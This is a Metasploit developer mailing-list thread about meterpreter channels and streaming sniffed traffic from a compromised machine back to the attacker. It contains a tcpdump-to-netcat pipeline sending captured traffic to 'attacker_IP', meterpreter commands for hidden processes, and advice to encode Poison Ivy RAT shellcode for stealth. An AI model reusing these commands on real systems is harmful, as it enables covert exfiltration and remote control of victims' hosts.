-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Bryan Richardson wrote:
> Hi again Anastacios,
> 
> Quick question... is there anything in the Metasploit Rex library that would
> allow me to start up a listener similar to netcat directly in Metasploit?
> This way, I could receive the results of my remote sniffing directly in my
> program and analyze it in real time...
> 
> Also, I've figured out how to access the channel created for an executed
> process.  Do you know of any way I could pipe output from a command I
> execute on the compromised machine to the channel?  For example, if I run
> tcpdump on the compromised host, I can read the output of the command via
> the channel.  However, this output is not in pcap format.  In order to get
> it in pcap format, I have to use the '-w' option to write it to a file in
> pcap format.  I can tell '-w' to write the data in pcap format to stdin
> using '-' as the value for '-w', then pipe stdin to something like netcat.
> 
> In turn, I'd like to be able to either pipe the data to the channel, or pipe
> it to netcat and hopefully use something in the Rex library to receive the
> pcap data...
> 
> What do you think?
> 
> --
> Thanks!
> Bryan
> 
> 2009/2/9 Anastasios Monachos <anastasi...@gmail.com>
> 
> 2009/2/9 Bryan Richardson <btri...@gmail.com>
>>> Thanks Anastasios,
>>>
>>> So, am I correct in assuming this is how one is dumped into a Windows
>>> shell after executing an exploit on a vulnerable Windows machine?
>>>
>> Bryan, if I am following you correctly, yes, using the download command
>> supplied by meterpreter payload you can get a file from victim's machine to
>> your machine. Note that in the case of windows you will have to escape the \
>> with an extra \ when(if) specifying the full path of the file's source and
>> destination, obviously if you do "download file.txt file.txt" it will try to
>> get the file from victim's current directory and save it to your current
>> directory.
>>
>>
>>> I was hoping that I could 'channelize' a traffic sniffer such that the
>>> sniffed traffic would be sent back to me in real time for real time
>>> analysis... it doesn't seem like this is the case.
>>>
>> I agree, real-time traffic in some environments really helps the whole task
>>
>>
>> Ultimately, what would be cool is to have my real-time traffic analysis
>>> software listening on a particular port and have some way of sending the
>>> sniffed traffic from the compromised machine to that particular port on my
>>> local machine.
>>>
>> I think it worths trying piping your live data through nc as we do with dd,
>> but I am not sure if it will work in your case, oh you will have to let your
>> nc traffic pass the firewall.
>>
>> For example:
>> On victim you can try something like: tcpdump -e host victim_ip and port 23
>> | nc attacker_IP attacker_listening_port
>> On attacker: nc -l -p attacker_listening_port | wireshark -i -
>>      Taken from wireshark's man
>>            " .... Pipe names should be either the name of a FIFO (named
>> pipe) or
>>            ''-'' to read data from the standard input.  Data read from
>> pipes
>>            must be in standard libpcap format...."
>>
>> Last you may also play with the channel read/write options, so to pass nc's
>> traffic through the channel (?), maybe someone else can reach more light
>> here
>>
>> Let us know what worked and what didnt anyway
>>
>> Tasos
>>
>>
>>> --
>>> Bryan
>>>
>>>  On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos <
>>> anastasi...@gmail.com> wrote:
>>>
>>>> 2009/2/9 Bryan Richardson <btri...@gmail.com>
>>>>
>>>> Hello All,
>>>>> Would someone mind explaining to me what 'channelized' is and how it
>>>>> works?
>>>>>
>>>> You can use "channelisation" in cases where you wish to work with
>>>> multiple communication channels that will be tunnelled through one tcp/ip
>>>> session.
>>>>
>>>> Channels are supported by the meterpreter payload, and to channelise you
>>>> can do:
>>>>
>>>> meterpreter > execute -f cmd.exe -H -c //this will execute the file
>>>> cmd.exe, it will hide the process window and it will channelise the task
>>>>
>>>> Process 1234 created.  //this is output from meterpreter
>>>>
>>>> Channel 2 created.//this is output from meterpreter
>>>>
>>>> meterpreter > //now use meterpreter as usual to do your other stuff
>>>>
>>>> meterpreter > interact 2 //now interact with channelised cmd.exe
>>>>
>>>>
>>>>> I'm wanting to try and use it to send sniffed traffic back to me from a
>>>>> compromised machine that I upload a traffic sniffer to...
>>>>>
>>>> For already saved captured data you could use the upload/download
>>>> commands (again from within meterpreter)
>>>>
>>>>> --
>>>>> Thanks!
>>>>> Bryan
>>>>>
>>>>> _______________________________________________
>>>>> Framework-Hackers mailing list
>>>>> Framework-Hackers@spool.metasploit.com
>>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>>>>
>>>>>
>>>> --
>>>> AM
>>>>
>>>
>>
>> --
>> AM
>> _______________________________________________
>> Framework-Hackers mailing list
>> Framework-Hackers@spool.metasploit.com
>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>
>>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers

Sorry if I misunderstood you. But as far as I can see, you're requesting
 for full control of hosts, so in that case, it may be a less painful
solution to install a remote administration tool on the compromised host.
For example, you could give a check to Poison Ivy
(http://www.poisonivy-rat.com), generate a shellcode, encode it with
msfencode to make it stealth, and then listen for the connection with
the client.
This tool will allow to sniff, set socks server, besides other features.
I found useful some time ago - still I dropped it with time - to have
such a shellcode integrated in msf payload/single, for customizing it's
settings and automatic encoding.
There are some things where metasploit isn't enough, or cases where it
could be achieved less painfully as I said.
Hope this helps.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJlXieH+KgkfcIQ8cRAh25AKDOLJhSbO0g8Hg4GhIr3daWUr1qFwCfbsUV
AA/6qggc8oeoKmoS2WcuIWo=
=8cjp
-----END PGP SIGNATURE-----
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to